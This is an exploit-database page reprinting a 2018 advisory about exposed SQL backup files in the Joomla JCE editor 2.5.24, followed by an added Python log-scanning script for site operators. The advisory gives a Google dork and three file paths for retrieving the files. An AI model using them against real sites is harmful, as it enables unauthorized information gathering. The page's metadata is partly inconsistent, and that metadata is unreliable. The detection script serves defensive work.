Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure

CVE: CVE-2013-7285
Category: CWE-264
Price: Not specified
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-12-01
CVSS: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/S:U/C:H/I:H/A:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120001

Below is a copy:

Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure
#################################################################################################

# Exploit Title : Joomla Content Editor Com_JCE Components 2.5.24 Database Backup Disclosure Information Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/11/2018
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads/
+ github.com/joomla/volunteers.joomla.org/tree/master/www/administrator/components/com_jce/sql
+ gitlab.dev.playkey.net/realzkh/realzkh_legacy/tree/master/administrator/components/com_jce/sql
+ JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.5.24 => joomlacontenteditor.net/news/jce-2524-released
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.6.33 ~ 2.5.24
# Google Dorks : inurl:''/index.php?option=com_jce''
Index of /administrator/components/com_jce/sql/
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path : 

/administrator/

# Exploit : 

/administrator/components/com_jce/sql/mysql.sql

/administrator/components/com_jce/sql/postgresql.sql

/administrator/components/com_jce/sql/sqlsrv.sql
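
For site operators: one way to see whether the paths above (or the directory index named in the dork) have been requested, and whether the server actually served them, is to scan the web server access log. The script below is an added example, not part of the original advisory; it assumes Combined Log Format, and the sample log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# The sql/ directory and the three files named in the advisory (any path prefix).
JCE_SQL = re.compile(
    r"/administrator/components/com_jce/sql(?:/(?:mysql|postgresql|sqlsrv)\.sql)?$",
    re.IGNORECASE,
)
# Combined Log Format: host ident user [time] "METHOD target PROTO" status size ...
LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

def normalise(target):
    """Drop query/fragment, percent-decode, collapse '//' and dot segments."""
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    parts = []
    for seg in path.split("/"):
        if seg == ".." and parts:
            parts.pop()
        elif seg not in ("", ".", ".."):
            parts.append(seg)
    return "/" + "/".join(parts)

def find_jce_sql_hits(lines):
    """Return (host, time, path, status, served) per request to the JCE sql/ paths."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a Combined Log Format line
        path = normalise(m["target"])
        if JCE_SQL.search(path):
            status = int(m["status"])
            served = status in (200, 206, 304)  # content was reachable
            hits.append((m["host"], m["time"], path, status, served))
    return hits

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [01/Dec/2018:10:02:11 +0000] "GET /administrator/components/com_jce/sql/mysql.sql HTTP/1.1" 200 5120 "-" "curl/7.61"',
    '198.51.100.7 - - [01/Dec/2018:10:02:12 +0000] "GET /nl//administrator/components/com_jce/sql/%73qlsrv.sql?x=1 HTTP/1.1" 403 199 "-" "curl/7.61"',
    '203.0.113.9 - - [01/Dec/2018:10:05:00 +0000] "GET /index.php?option=com_jce HTTP/1.1" 200 8312 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Dec/2018:10:06:30 +0000] "GET /administrator/components/com_jce/sql/ HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(*find_jce_sql_hits(SAMPLE), sep="\n")
```

Hits with served set to True show the files or the directory listing are reachable from the web; a 403 or 404 on the same path shows the request was blocked.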

#################################################################################################

# Example Vulnerable Sites =>


#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
